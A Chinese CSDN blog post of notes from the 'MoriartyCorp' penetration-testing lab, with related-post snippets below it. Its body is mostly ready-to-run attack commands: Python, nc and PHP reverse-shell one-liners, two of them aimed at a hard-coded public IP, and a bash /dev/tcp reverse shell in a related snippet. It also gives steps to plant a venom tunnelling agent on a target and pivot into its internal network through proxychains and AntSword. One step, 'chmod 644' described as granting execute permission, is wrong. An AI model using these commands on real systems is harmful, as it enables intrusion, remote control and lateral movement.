MoriartyCorp靶机之文件包含漏洞弹shell、python 反弹shell、nc弹shell、php弹shell、利用venom内网穿透、中国蚁剑配置代理连接内网穿透

已于 2023-05-12 09:04:38 修改
阅读量239 收藏 1
点赞数
文章标签: php linux 服务器
于 2023-04-28 15:16:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40898302/article/details/130426841
版权
本文详细介绍了利用文件包含漏洞进行攻击的方法,包括使用python、nc、php创建反弹shell,以及如何通过venom进行内网穿透。同时,提到了中国蚁剑的代理连接配置和proxychains在内网穿透中的应用,以及burp套件内网抓包的代理设置。
摘要由CSDN通过智能技术生成

目录

文件包含漏洞弹shell

python 反弹shell

nc弹shell

php弹shell

利用venom内网穿透

中国蚁剑配置代理连接内网穿透

文件包含漏洞弹shell

python 反弹shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

nc弹shell

nc -e /bin/bash 120.48.78.112 6666

php弹shell

php -r '$sock=fsockopen("120.48.78.112",6666);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

proxychains 代理的配置

利用venom内网穿透

服务器端监听:

1、赋予执行权限 chmod 644 admin_linux_x64

2、admin_linux_x64 -lport xxxx

客户端:99999

1、agen_linux_x64放到目标主机

2、尽量放到有执行权限的目录例如/tmp

3、赋予执行权限 chmod 777 agen_linux_x64

4、命令:agen_linux_x64 -lhost xx.xx.xx.xx -lport xxxx

连接成功:

服务器端:

查案节点:show

进入节点:goto 1

设置代理:socks 1080

注意:在proxychains 配置文件

vi /etc/proxychains4.conf

最后一行配置

socks 1080

并且注释掉 remote_dns_subnet 224

在其他内网穿透命令前要用proxychains

中国蚁剑配置代理连接内网穿透

在代理设置里面设置

socks5 127.0.0.1 1080

burp内网抓包

在user options中设置socks5 proxy

socks proxy host 127.0.0.1

socks proxy port 1080

白冷
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅析Linux之bash反弹shell原理
01-08
靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是...
linux反弹shell的原理详解
01-08
利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是...
中国蚁剑安装使用教程
天天学安全专属博客
03-29 1万+
中国蚁剑安装教程,中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF。
kali下安装使用蚁剑(AntSword)
Reset
06-27 1075
蚁剑(AntSword)是一个webshell管理工具。官方文档:https://www.yuque.com/antswordproject/antsword。
蚁剑软件的配置与应用
weixin_45711977的博客
10-27 7499
中国蚁剑
文件上传漏洞工具中国蚁剑的安装配置以及使用
qq_38865635的博客
05-29 4186
文件上传漏洞工具中国蚁剑的安装配置和使用
蚁剑使用教程
Vincent0sen的博客
09-14 1440
蚁剑使用介绍
upload 靶机上传漏洞利用教学(含代码分析).doc
09-16
php 上传漏洞大演练。推荐使用Windows系统搭建,我最先使用docker pull c0ny1/upload-labs的镜像在Pass-03遇到问题,初步判断是该镜像内的php.conf文件配置错误导致。
中国蚁剑(AntSword)安装、使用教程
热门推荐
凝聚力安全团队
08-24 9万+
项目地址 加载器: https://github.com/eastmountyxz/AntSword-Experiment/ 项目核心源码: https://github.com/yuyuko233/AntSword 如果从github上下载很卡,可以去复制链接到githubd上下载 https://githubd.com 安装教程 我使用的渗透机为windows10,下载好会包含两个文件: 使用教程 插件安装 ...
蚁剑
mw_myever的博客
10-04 4881
一、介绍 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 就我个人而言:中华蚁剑是一款界面整洁,且比菜刀还好用的的shell控制端软件 二、中华蚁剑的下载 不多废话直接上链接 网盘链接: 点我提取 提取码:mw13 github链接: 蚁剑源码 核心加载器 三、安装 下载好以后将两个压缩包放到对应的文件夹里 ...
linux搭建代理服务器+蚁剑配置客户端代理
baguangman5501的博客
07-26 1561
一:linux搭建代理服务器 0x00 介绍 关于搭建代理服务器的方法,我也是刚刚接触,从网上找了一些能够行得通的方法来给大家做个分享: 这里我用的是Tinyproxy作为代理服务软件。这个东西很小,并没有几M。 tinyproxy最大的特点就是小,功能简单,配置简单 (注意此代理方式为常规使用,并不能进行KX上网吼~) 想要KX上网的同学,请参考我的上一篇博文咳咳!~ 0x01 安装 ...
我不允许还有人没下载使用中国蚁剑,修改蚁剑特征冲它
03-06 1万+
安装使用,并修改蚁剑特征
文件上传-.user.ini利用
最新发布
feiwujiushiwo的博客
08-13 185
php.ini是php的全局配置文件,对整个web服务起作用.user.ini和.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
zabbix的setup无法进入第二步
houduanq的博客
08-11 465
chmod: 无法访问"/var/lib/php/session": 没有那个文件或目录。
thinkphp漏洞之sql注入漏洞-builder处漏洞
banliyaoguai的博客
08-09 571
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
[FSCTF 2023]细狗2.0
2301_81462177的博客
08-09 321
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
PHP图书借阅微信小程序系统源码
2401_84414018的博客
08-12 206
图书借阅微信小程序”不仅是一个借阅工具,更是你探索知识、享受阅读的得力助手。在这个快节奏的时代,让我们一起慢下来,用阅读滋养心灵,开启一段段美妙的阅读旅程吧!快来加入我们,发现更多阅读的乐趣和惊喜!📚🌟。
【信创】Linux系统如何使用命令行或图形化工具禁用ipv6 _ 统信 _ 麒麟 _ 中科方德
鹏大圣运维
08-09 1071
Hello,大家好啊,今天给大家带来一篇关于在Linux系统中如何使用命令行或Grub Customizer工具禁用IPv6的文章。IPv6在某些环境下可能会引起网络问题或不必要的复杂性,因此禁用它可能会提高系统的稳定性和性能。本文将详细介绍两种禁用IPv6的方法。欢迎大家分享转发,点个关注和在看吧!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值